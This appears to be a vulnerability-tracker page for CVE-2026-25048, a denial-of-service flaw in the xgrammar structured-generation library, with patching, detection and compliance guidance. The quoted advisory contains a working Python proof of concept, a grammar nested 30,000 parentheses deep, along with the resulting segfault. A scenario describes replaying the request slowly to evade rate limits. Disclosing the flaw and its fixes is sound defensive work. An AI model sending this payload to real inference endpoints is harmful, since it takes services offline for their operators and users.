CVE-2026-25048: xgrammar: security flaw enables exploitation

GHSA-7rgv-gqhr-fxg3 HIGH
Published March 5, 2026
CISO Take

If your AI inference stack uses xgrammar for structured output generation, patch to v0.1.32 immediately — a single-line malicious grammar string crashes the inference worker process cold. Any system accepting externally-supplied grammar rules is exposed to trivial DoS; no special skills required. This is a patch-now, no-exception item for teams running constrained LLM generation pipelines.

What is the risk?

Medium-High. Exploitability is trivial (30,000 chars of parentheses, no ML knowledge needed) but attack surface is scoped to deployments where external actors can supply grammar rules to the xgrammar compiler. Unpatched inference services accepting user-defined structured output schemas can be taken offline with a single HTTP request. Impact is pure availability — no RCE, no data exfiltration. EPSS is low (0.00052) reflecting limited in-the-wild activity so far, but PoC is public and the barrier to exploitation is near-zero.

What systems are affected?

Package Ecosystem Vulnerable Range Patched
XGrammar pip <= 0.1.31 0.1.32
1.8K 160 dependents Pushed 12d ago 100% patched ~5d to patch Full package profile →

Do you use XGrammar? You're affected.

How severe is it?

CVSS 3.1
N/A
EPSS
0.4%
chance of exploitation in 30 days
Higher than 33% of all CVEs
Exploitation Status
No known exploitation
Sophistication
Trivial

What should I do?

5 steps
  1. PATCH

    Upgrade xgrammar to v0.1.32 now — pip install --upgrade xgrammar. Verify: pip show xgrammar | grep Version.

  2. AUDIT

    Inventory all inference services — CI/CD pipelines, model servers, agent runtimes — for xgrammar <= 0.1.31.

  3. WORKAROUND (if patching is delayed): Validate grammar inputs server-side before passing to compiler — reject inputs with nesting depth > 500 or total length > 10KB.

  4. DETECT

    Alert on inference process crashes or abnormal restart frequency; correlate with grammar compilation events in application logs.

  5. ISOLATE

    Run grammar compilation in a sandboxed subprocess with ulimit memory/stack caps to contain blast radius if a zero-day follows.

What does CISA's SSVC say?

Decision Track
Exploitation none
Automatable Yes
Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Art.9 - Risk management system Article 9 - Risk Management System — technical robustness and safety
ISO 42001
8.4 - AI system operation and monitoring A.6.2.6 - Availability of AI system
NIST AI RMF
GOVERN-4.1 - Organizational risk policies cover AI risks MANAGE-2.2 - Mechanisms to maintain AI system reliability and resilience MANAGE-2.4 - Residual risks are managed
OWASP LLM Top 10
LLM04 - Model Denial of Service LLM10:2025 - Unbounded Consumption

Frequently Asked Questions

What is CVE-2026-25048?

If your AI inference stack uses xgrammar for structured output generation, patch to v0.1.32 immediately — a single-line malicious grammar string crashes the inference worker process cold. Any system accepting externally-supplied grammar rules is exposed to trivial DoS; no special skills required. This is a patch-now, no-exception item for teams running constrained LLM generation pipelines.

Is CVE-2026-25048 actively exploited?

No confirmed active exploitation of CVE-2026-25048 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-25048?

1. PATCH: Upgrade xgrammar to v0.1.32 now — `pip install --upgrade xgrammar`. Verify: `pip show xgrammar | grep Version`. 2. AUDIT: Inventory all inference services — CI/CD pipelines, model servers, agent runtimes — for xgrammar <= 0.1.31. 3. WORKAROUND (if patching is delayed): Validate grammar inputs server-side before passing to compiler — reject inputs with nesting depth > 500 or total length > 10KB. 4. DETECT: Alert on inference process crashes or abnormal restart frequency; correlate with grammar compilation events in application logs. 5. ISOLATE: Run grammar compilation in a sandboxed subprocess with ulimit memory/stack caps to contain blast radius if a zero-day follows.

What systems are affected by CVE-2026-25048?

This vulnerability affects the following AI/ML architecture patterns: model serving, inference pipelines, agent frameworks, structured generation / constrained decoding.

What is the CVSS score for CVE-2026-25048?

No CVSS score has been assigned yet.

What is the AI security impact?

Affected AI Architectures

model servinginference pipelinesagent frameworksstructured generation / constrained decoding

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0029 Denial of AI Service
AML.T0034 Cost Harvesting
AML.T0049 Exploit Public-Facing Application

Compliance Controls Affected

EU AI Act: Art.9, Article 9
ISO 42001: 8.4, A.6.2.6
NIST AI RMF: GOVERN-4.1, MANAGE-2.2, MANAGE-2.4
OWASP LLM Top 10: LLM04, LLM10:2025

What are the technical details?

Original Advisory

### Summary The multi-level nested syntax caused a segmentation fault (core dump). ### Details A trigger stack overflow or memory exhaustion was caused by constructing a malicious grammar rule containing 30,000 layers of nested parentheses. ### PoC ``` #!/usr/bin/env python3 """ XGrammar - Math Expression Generation Example """ import xgrammar as xgr import torch from transformers import AutoModelForCausalLM, AutoTokenizer, AutoConfig s = '(' * 30000 + 'a' grammar = f"root ::= {s}" def main(): device = "cuda" if torch.cuda.is_available() else "cpu" model_name = "Qwen/Qwen2.5-0.5B-Instruct" # Load model model = AutoModelForCausalLM.from_pretrained( model_name, torch_dtype=torch.float16 if device == "cuda" else torch.float32, device_map=device ) tokenizer = AutoTokenizer.from_pretrained(model_name) config = AutoConfig.from_pretrained(model_name) # Math expression grammar math_grammar = grammar # Setup tokenizer_info = xgr.TokenizerInfo.from_huggingface( tokenizer, vocab_size=config.vocab_size ) compiler = xgr.GrammarCompiler(tokenizer_info) compiled_grammar = compiler.compile_grammar(math_grammar) # Generate prompt = "Math: " inputs = tokenizer(prompt, return_tensors="pt").to(device) xgr_processor = xgr.contrib.hf.LogitsProcessor(compiled_grammar) output_ids = model.generate( **inputs, max_new_tokens=50, logits_processor=[xgr_processor] ) result = tokenizer.decode( output_ids[0][len(inputs.input_ids[0]):], skip_special_tokens=True ) print(f"Generated expression: {result}") if __name__ == "__main__": main() ``` ``` > pip show xgrammar Name: xgrammar Version: 0.1.31 Summary: Efficient, Flexible and Portable Structured Generation Home-page: Author: MLC Team Author-email: License: Apache 2.0 Location: /home/yuelinwang/.local/lib/python3.10/site-packages Requires: numpy, pydantic, torch, transformers, triton, typing-extensions Required-by: > python3 1.py `torch_dtype` is deprecated! Use `dtype` instead! Segmentation fault (core dumped) ``` ### Impact DoS

Exploitation Scenario

Adversary discovers a public-facing LLM API endpoint (e.g., an AI coding assistant or data extraction service) that accepts a user-defined output schema powered by xgrammar for structured JSON generation. They craft a grammar string — `'(' * 30000 + 'a'` — trivially generated in one Python line. Submitting this as the output grammar schema triggers a stack overflow during xgrammar compilation, segfaulting the inference worker. On non-containerized deployments, the service is down until manual intervention. On Kubernetes, the pod restart loop is detectable but creates sustained degraded availability. With no input validation, the adversary sustains the DoS by replaying the request at low frequency, evading rate-limiting thresholds.

Weaknesses (CWE)

CWE-674 — Uncontrolled Recursion: The product does not properly control the amount of recursion that takes place, consuming excessive resources, such as allocated memory or the program stack.

  • [Implementation] Ensure that an end condition will be reached under all logic conditions. The end condition may include checking against the depth of recursion and exiting with an error if the recursion goes too deep. The complexity of the end condition contributes to the effectiveness of this action.
  • [Implementation] Increase the stack size.

Source: MITRE CWE corpus.

Timeline

Published
March 5, 2026
Last Modified
March 5, 2026
First Seen
March 24, 2026

Related Vulnerabilities